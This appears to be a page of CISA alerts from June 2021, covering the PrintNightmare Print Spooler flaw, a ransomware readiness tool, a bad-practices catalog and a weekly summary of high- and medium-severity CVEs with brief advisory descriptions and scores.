PrintNightmare, Critical Windows Print Spooler Vulnerability

06/30/2021 05:32 PM EDT

Original release date: June 30, 2021

The CERT Coordination Center (CERT/CC) has released a VulNote for a critical remote code execution vulnerability in the Windows Print spooler service, noting: “while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.” An attacker can exploit this vulnerability—nicknamed PrintNightmare—to take control of an affected system.

CISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. Additionally, administrators should employ the following best practice from Microsoft’s how-to guides, published January 11, 2021: “Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object.” 

 

 

This product is provided subject to this Notification and this Privacy & Use policy.

CISA’s CSET Tool Sets Sights on Ransomware Threat

06/30/2021 12:45 PM EDT

Original release date: June 30, 2021

CISA has released a new module in its Cyber Security Evaluation Tool (CSET): the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate their cybersecurity practices on their networks. CSET—applicable to both information technology (IT) and industrial control system (ICS) networks—enables users to perform a comprehensive evaluation of their cybersecurity posture using many recognized government and industry standards and recommendations.

The RRA is a self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident. CISA has tailored the RRA to varying levels of ransomware threat readiness to make it useful to all organizations regardless of their current cybersecurity maturity. The RRA:

  • Helps organizations evaluate their cybersecurity posture, with respect to ransomware, against recognized standards and best practice recommendations in a systematic, disciplined, and repeatable manner.
  • Guides asset owners and operators through a systematic process to evaluate their operational technology (OT) and information technology (IT) network security practices against the ransomware threat.
  • Provides an analysis dashboard with graphs and tables that present the assessment results in both summary and detailed form.

CISA strongly encourages all organizations to take the CSET Ransomware Readiness Assessment, available at https://github.com/cisagov/cset/.

This product is provided subject to this Notification and this Privacy & Use policy.

CISA Begins Cataloging Bad Practices that Increase Cyber Risk

06/29/2021 06:27 AM EDT

Original release date: June 29, 2021

In a blog post by Executive Assistant Director (EAD) Eric Goldstein, CISA announced  the creation of a catalog to document bad cybersecurity practices that are exceptionally risky for any organization and especially dangerous for those supporting designated Critical Infrastructure or National Critical Functions.

While extensive guidance on cybersecurity “best practices” exists, additional perspective is needed. Ending the most egregious risks requires organizations to make a concerted effort to stop bad practices.

CISA encourages cybersecurity leaders and professionals to review EAD Goldstein’s blog post and the new Bad Practices webpage and to monitor the webpage for updates. CISA also encourages all organizations to engage in the necessary actions and critical conversations to address bad practices.

This product is provided subject to this Notification and this Privacy & Use policy.

Vulnerability Summary for the Week of June 21, 2021

06/28/2021 08:23 AM EDT

Original release date: June 28, 2021

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
apache — nuttx Apache Nuttx Versions prior to 10.1.0 are vulnerable to integer wrap-around in functions malloc, realloc and memalign. This improper memory assignment can lead to arbitrary memory allocation, resulting in unexpected behavior such as a crash or a remote code injection/execution. 2021-06-21 7.5 CVE-2021-26461
CONFIRM
autoptimize — autoptimize The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) form the uploaded archive via the “Import Settings” feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the “Import Settings” functionality to achieve Remote Code Execution. 2021-06-21 7.5 CVE-2021-24376
CONFIRM
ayecode — location_manager In the Location Manager WordPress plugin before 2.1.0.10, the AJAX action gd_popular_location_list did not properly sanitise or validate some of its POST parameters, which are then used in a SQL statement, leading to unauthenticated SQL Injection issues. 2021-06-21 7.5 CVE-2021-24361
MISC
CONFIRM
cleo — lexicom An issue was discovered in Cleo LexiCom 5.5.0.0. Within the AS2 message, the sender can specify a filename. This filename can include path-traversal characters, allowing the file to be written to an arbitrary location on disk. 2021-06-18 7.5 CVE-2021-33576
MISC
MISC
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. A buffer overflow vulnerability exists in Contiki-NG versions prior to 4.6. After establishing a TCP socket using the tcp-socket library, it is possible for the remote end to send a packet with a data offset that is unvalidated. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 7.5 CVE-2021-21281
MISC
CONFIRM
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. It is possible to cause an out-of-bounds write in versions of Contiki-NG prior to 4.6 when transmitting a 6LoWPAN packet with a chain of extension headers. Unfortunately, the written header is not checked to be within the available space, thereby making it possible to write outside the buffer. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 7.5 CVE-2021-21280
MISC
CONFIRM
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In verions prior to 4.6, an attacker can perform a denial-of-service attack by triggering an infinite loop in the processing of IPv6 neighbor solicitation (NS) messages. This type of attack can effectively shut down the operation of the system because of the cooperative scheduling used for the main parts of Contiki-NG and its communication stack. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 7.8 CVE-2021-21279
CONFIRM
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.5, buffer overflow can be triggered by an input packet when using either of Contiki-NG’s two RPL implementations in source-routing mode. The problem has been patched in Contiki-NG 4.5. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 7.5 CVE-2021-21282
MISC
CONFIRM
google — android In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-169255797 2021-06-21 7.2 CVE-2021-0478
MISC
google — android In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181860042 2021-06-21 8.3 CVE-2021-0507
MISC
google — android In the Settings app, there is a possible way to disable an always-on VPN due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179975048 2021-06-21 7.2 CVE-2021-0505
MISC
google — android In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181660448 2021-06-21 7.5 CVE-2021-0516
MISC
greenbone — greenbone_security_assistant Greenbone Security Assistant (GSA) before 7.0.3 and Greenbone OS (GOS) before 5.0.0 allow Host Header Injection. 2021-06-21 7.5 CVE-2018-25016
MISC
MISC
jenkins — generic_webhook_trigger Jenkins Generic Webhook Trigger Plugin 1.72 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks. 2021-06-18 7.5 CVE-2021-21669
CONFIRM
MLIST
joomla — joomla! Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise restricted actions and subsequently retrieve password reset tokens from the database through an already existing SQL injection vector. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 7.5 CVE-2010-1435
MISC
MISC
joomla — joomla! Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Joomla! Core versions 1.5.x ranging from 1.5.0 and up to and including 1.5.15 are vulnerable. 2021-06-21 7.5 CVE-2010-1433
MISC
MISC
primion-digitek — secure_8 Secure 8 (Evalos) does not validate user input data correctly, allowing a remote attacker to perform a Blind SQL Injection. An attacker could exploit this vulnerability in order to extract information of users and administrator accounts stored in the database. 2021-06-18 7.5 CVE-2021-3604
CONFIRM
CONFIRM
radykal — fancy_product_designer The Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution. 2021-06-21 7.5 CVE-2021-24370
MISC
CONFIRM
serenityos — serenityos SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation. 2021-06-18 7.5 CVE-2021-31272
MISC
MISC
MISC
CONFIRM
textpattern — textpattern Textpattern 4.7.3 contains an aribtrary file load via the file_insert function in include/txp_file.php. 2021-06-21 7.5 CVE-2020-19510
MISC
txjia — imcat SQL Injection vulnerability in imcat v5.2 via the fm[auser] parameters in coms/add_coms.php. 2021-06-23 7.5 CVE-2020-20392
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 is vulnerable to unauthorized access via user_edit_password.php, remote attackers can modify the password of any user. 2021-06-21 7.5 CVE-2020-20466
MISC
white_shark_systems_project — white_shark_systems White Shark System (WSS) 1.3.2 has an unauthorized access vulnerability in default_user_edit.php, remote attackers can exploit this vulnerability to escalate to admin privileges. 2021-06-21 9 CVE-2020-20471
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
5none — nonecms Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component “/nonecms/vendor”. 2021-06-22 5 CVE-2020-18647
MISC
5none — nonecms Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component “/public/index.php”. 2021-06-22 5 CVE-2020-18646
MISC
accellion — kiteworks Accellion Kiteworks before 7.3.1 allows a user with Admin privileges to escalate their privileges by generating SSH passwords that allow local access. 2021-06-23 4.6 CVE-2021-31585
CONFIRM
MISC
accellion — kiteworks Accellion Kiteworks before 7.4.0 allows an authenticated user to perform SQL Injection via LDAPGroup Search. 2021-06-23 6.5 CVE-2021-31586
MISC
CONFIRM
advantech — webaccess/scada Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to a directory traversal, which may allow an attacker to remotely read arbitrary files on the file system. 2021-06-18 6.8 CVE-2021-32954
MISC
advantech — webaccess/scada Advantech WebAccess/SCADA Versions 9.0.1 and prior is vulnerable to redirection, which may allow an attacker to send a maliciously crafted URL that could result in redirecting a user to a malicious webpage. 2021-06-18 5.8 CVE-2021-32956
MISC
akaunting — akaunting Akaunting <= 2.0.9 is vulnerable to CSV injection in the Item name field, export function. Attackers can inject arbitrary code into the name parameter and perform code execution when the crafted file is opened. 2021-06-21 6.8 CVE-2020-22390
MISC
automattic — jetpack The Jetpack Carousel module of the JetPack WordPress plugin before 9.8 allows users to create a “carousel” type image gallery and allows users to comment on the images. A security vulnerability was found within the Jetpack Carousel module by nguyenhg_vcs that allowed the comments of non-published page/posts to be leaked. 2021-06-21 5 CVE-2021-24374
CONFIRM
MISC
autoptimize — autoptimize The Autoptimize WordPress plugin before 2.7.8 attempts to remove potential malicious files from the extracted archive uploaded via the ‘Import Settings’ feature, however this is not sufficient to protect against RCE as a race condition can be achieved in between the moment the file is extracted on the disk but not yet removed. It is a bypass of CVE-2020-24948. 2021-06-21 6.8 CVE-2021-24377
CONFIRM
bosch — b426_firmware This vulnerability could allow an attacker to hijack a session while a user is logged in the configuration web page. This vulnerability was discovered by a security researcher in B426 and found during internal product tests in B426-CN/B429-CN, and B426-M and has been fixed already starting from version 3.08 on, which was released on June 2019. 2021-06-18 6.8 CVE-2021-23845
CONFIRM
bosch — b426_firmware When using http protocol, the user password is transmitted as a clear text parameter for which it is possible to be obtained by an attacker through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021. 2021-06-18 4.3 CVE-2021-23846
CONFIRM
cleo — lexicom An issue was discovered in Cleo LexiCom 5.5.0.0. The requirement for the sender of an AS2 message to identify themselves (via encryption and signing of the message) can be bypassed by changing the Content-Type of the message to text/plain. 2021-06-18 5 CVE-2021-33577
MISC
MISC
collne — welcart Cross-site scripting vulnerability in Welcart e-Commerce versions prior to 2.2.4 allows remote attackers to inject arbitrary script or HTML via unspecified vectors. 2021-06-22 4.3 CVE-2021-20734
MISC
MISC
color-string_project — color-string A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Color-String version 1.5.5 and below which occurs when the application is provided and checks a crafted invalid HWB string. 2021-06-21 5 CVE-2021-29060
MISC
MISC
MISC
MISC
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for internet of things devices. The RPL-Classic and RPL-Lite implementations in the Contiki-NG operating system versions prior to 4.6 do not validate the address pointer in the RPL source routing header This makes it possible for an attacker to cause out-of-bounds writes with packets injected into the network stack. Specifically, the problem lies in the rpl_ext_header_srh_update function in the two rpl-ext-header.c modules for RPL-Classic and RPL-Lite respectively. The addr_ptr variable is calculated using an unvalidated CMPR field value from the source routing header. An out-of-bounds write can be triggered on line 151 in os/net/routing/rpl-lite/rpl-ext-header.c and line 261 in os/net/routing/rpl-classic/rpl-ext-header.c, which contain the following memcpy call with addr_ptr as destination. The problem has been patched in Contiki-NG 4.6. Users can apply a patch out-of-band as a workaround. 2021-06-18 5 CVE-2021-21257
MISC
CONFIRM
contiki-ng — contiki-ng Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. An out-of-bounds read can be triggered by 6LoWPAN packets sent to devices running Contiki-NG 4.6 and prior. The IPv6 header decompression function (<code>uncompress_hdr_iphc</code>) does not perform proper boundary checks when reading from the packet buffer. Hence, it is possible to construct a compressed 6LoWPAN packet that will read more bytes than what is available from the packet buffer. As of time of publication, there is not a release with a patch available. Users can apply the patch for this vulnerability out-of-band as a workaround. 2021-06-18 6.4 CVE-2021-21410
CONFIRM
MISC
ec-cube — business_form_output Cross-site scripting vulnerability in EC-CUBE Category contents plugin (for EC-CUBE 3.0 series) versions prior to version 1.0.1 allows a remote attacker to inject an arbitrary script by leading an administrator or a user to a specially crafted page and to perform a specific operation. 2021-06-22 4.3 CVE-2021-20744
MISC
MISC
ec-cube — business_form_output Cross-site scripting vulnerability in EC-CUBE Business form output plugin (for EC-CUBE 3.0 series) versions prior to version 1.0.1 allows a remote attacker to inject an arbitrary script via unspecified vector. 2021-06-22 4.3 CVE-2021-20742
MISC
MISC
ec-cube — email_newsletters_management Cross-site scripting vulnerability in EC-CUBE Email newsletters management plugin (for EC-CUBE 3.0 series) versions prior to version 1.0.4 allows a remote attacker to inject an arbitrary script by leading a user to a specially crafted page and to perform a specific operation. 2021-06-22 4.3 CVE-2021-20743
MISC
MISC
expresstech — quiz_and_survey_master The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin WordPress plugin before 7.1.18 did not sanitise or escape its result_id parameter when displaying an existing quiz result page, leading to a reflected Cross-Site Scripting issue. This could allow for privilege escalation by inducing a logged in admin to open a malicious link 2021-06-20 4.3 CVE-2021-24368
CONFIRM
get-simple — getsimplecms Cross Site Scriptiong (XSS) vulnerability in GetSimpleCMS <=3.3.15 via the timezone parameter to settings.php. 2021-06-23 4.3 CVE-2020-18658
MISC
MISC
MISC
get-simple — getsimplecms Cross Site Scripting vulnerability in GetSimpleCMS <=3.3.15 via the (1) sitename, (2) username, and (3) email parameters to /admin/setup.php 2021-06-23 4.3 CVE-2020-18659
MISC
MISC
MISC
getastra — wp_hardening The WP Hardening – Fix Your WordPress Security WordPress plugin before 1.2.2 did not sanitise or escape the $_SERVER[‘REQUEST_URI’] before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. 2021-06-21 4.3 CVE-2021-24372
CONFIRM
getastra — wp_hardening The WP Hardening – Fix Your WordPress Security WordPress plugin before 1.2.2 did not sanitise or escape the historyvalue GET parameter before outputting it in a Javascript block, leading to a reflected Cross-Site Scripting issue. 2021-06-21 4.3 CVE-2021-24373
CONFIRM
gitpod — gitpod Gitpod before 0.6.0 allows unvalidated redirects. 2021-06-22 5.8 CVE-2021-35206
MISC
MISC
MISC
MISC
MISC
MISC
MISC
MISC
google — android In archiveStoredConversation of MmsService.java, there is a possible way to archive message conversation without user consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-180419673 2021-06-22 4.6 CVE-2021-0539
MISC
google — android In dropFile of WiFiInstaller, there is a way to delete files accessible to CertInstaller due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176756691 2021-06-22 4.6 CVE-2021-0536
MISC
google — android In wpas_ctrl_msg_queue_timeout of ctrl_iface_unix.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-168314741 2021-06-22 4.6 CVE-2021-0535
MISC
google — android In halWrapperDataCallback of hal_wrapper.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169328517 2021-06-22 4.6 CVE-2021-0540
MISC
google — android In RenderStruct of protostream_objectsource.cc, there is a possible crash due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179161711 2021-06-22 5 CVE-2021-0555
MISC
google — android In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-174182139 2021-06-21 5 CVE-2021-0522
MISC
google — android In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-181962311 2021-06-21 6.9 CVE-2021-0506
MISC
google — android In permission declarations of DeviceAdminReceiver.java, there is a possible lack of broadcast protection due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170639543 2021-06-22 4.6 CVE-2021-0534
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195272 2021-06-21 4.6 CVE-2021-0531
MISC
google — android In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185196175 2021-06-21 4.6 CVE-2021-0530
MISC
google — android In memory management driver, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195268 2021-06-21 4.6 CVE-2021-0529
MISC
google — android In memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195266 2021-06-21 4.6 CVE-2021-0528
MISC
google — android In memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193931 2021-06-21 4.6 CVE-2021-0527
MISC
google — android In phNxpNciHal_process_ext_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258743 2021-06-22 4.6 CVE-2021-0543
MISC
google — android In memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185195264 2021-06-21 4.6 CVE-2021-0526
MISC
google — android In memory management driver, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193929 2021-06-21 4.6 CVE-2021-0525
MISC
google — android In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-156090809 2021-06-21 4.6 CVE-2021-0513
MISC
google — android In __hidinput_change_resolution_multipliers of hid-input.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-173843328References: Upstream kernel 2021-06-21 4.6 CVE-2021-0512
MISC
google — android In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-178055795 2021-06-21 4.6 CVE-2021-0511
MISC
google — android In pfkey_dump of af_key.c, there is a possible out-of-bounds read due to a missing bounds check. This could lead to local information disclosure in the kernel with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-110373476 2021-06-22 4.9 CVE-2021-0605
MISC
google — android In updateCapabilities of ConnectivityService.java, there is a possible incorrect network state determination due to a logic error in the code. This could lead to biasing of networking tasks to occur on non-VPN networks, which could lead to remote information disclosure, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179053823 2021-06-21 5 CVE-2021-0517
MISC
google — android In sendBugreportNotification of BugreportProgressService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-178803845 2021-06-22 4.6 CVE-2021-0570
MISC
google — android In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169257710 2021-06-22 4.6 CVE-2021-0544
MISC
google — android In onCreate of WifiScanModeActivity.java, there is a possible way to enable Wi-Fi scanning without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-174047492 2021-06-21 4.4 CVE-2021-0523
MISC
google — android In bind of MediaControlPanel.java, there is a possible way to lock up the system UI using a malicious media file due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-180518039 2021-06-22 4.3 CVE-2021-0551
MISC
google — android In setRange of ABuffer.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179046129 2021-06-22 6.8 CVE-2021-0557
MISC
google — android In fillMainDataBuf of pvmp3_framedecoder.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173473906 2021-06-22 4.3 CVE-2021-0558
MISC
google — android In Lag_max of p_ol_wgh.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172312730 2021-06-22 4.3 CVE-2021-0559
MISC
google — android In wrapUserThread of AudioStream.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174801970 2021-06-22 4.4 CVE-2021-0565
MISC
google — android In decrypt of CryptoPlugin.cpp, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176495665 2021-06-22 4.4 CVE-2021-0564
MISC
google — android In onBindViewHolder of AppSwitchPreference.java, there is a possible bypass of device admin setttings due to unclear UI. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169936038 2021-06-22 4.4 CVE-2021-0553
MISC
google — android In onCreate of EmergencyCallbackModeExitDialog.java, there is a possible exit of emergency callback mode due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-178821491 2021-06-22 4.4 CVE-2021-0538
MISC
google — android In onCreate of WiFiInstaller.java, there is a possible way to install a malicious Hotspot 2.0 configuration due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176756141 2021-06-22 4.4 CVE-2021-0537
MISC
google — android In memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185193932 2021-06-21 4.4 CVE-2021-0533
MISC
google — android In memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-185196177 2021-06-21 4.4 CVE-2021-0532
MISC
google — android In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-176237595 2021-06-21 4.4 CVE-2021-0520
MISC
google — android In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC server with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258884 2021-06-22 4.6 CVE-2021-0545
MISC
google — android In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161 2021-06-21 4.4 CVE-2021-0509
MISC
google — android In handleAppLaunch of AppLaunchActivity.java, there is a possible arbitrary activity launch due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174870704 2021-06-22 4.6 CVE-2021-0608
MISC
google — android In iaxxx_calc_i2s_div of iaxxx-codec.c, there is a possible hardware port write with user controlled data due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-180950209 2021-06-22 4.6 CVE-2021-0607
MISC
google — android In drm_syncobj_handle_to_fd of drm_syncobj.c, there is a possible use after free due to incorrect refcounting. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168034487 2021-06-22 4.6 CVE-2021-0606
MISC
google — android In ActivityTaskManagerService.startActivity() and AppTaskImpl.startActivity() of ActivityTaskManagerService.java and AppTaskImpl.java, there is possible access to restricted activities due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137395936 2021-06-22 4.6 CVE-2021-0571
MISC
google — android In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622 2021-06-21 4.6 CVE-2021-0510
MISC
google — android In onReceive of DevicePolicyManagerService.java, there is a possible enabling of disabled profiles due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170121238 2021-06-22 4.6 CVE-2021-0568
MISC
google — android In isRestricted of RemoteViews.java, there is a possible way to inject font files due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179461812 2021-06-22 4.6 CVE-2021-0567
MISC
google — android In onLoadFailed of AnnotateActivity.java, there is a possible way to gain WRITE_EXTERNAL_STORAGE permissions without user consent due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179688673 2021-06-22 4.6 CVE-2021-0550
MISC
google — android In rw_i93_send_to_lower of rw_i93.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-157650357 2021-06-22 4.6 CVE-2021-0548
MISC
google — android In onReceive of NetInitiatedActivity.java, there is a possible way to supply an attacker-controlled value to a GPS HAL handler due to a missing permission check. This could lead to local escalation of privilege that may result in undefined behavior in some HAL implementations with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174151048 2021-06-22 4.6 CVE-2021-0547
MISC
google — android In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169258733 2021-06-22 4.6 CVE-2021-0546
MISC
google — android In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154 2021-06-21 6.9 CVE-2021-0508
MISC
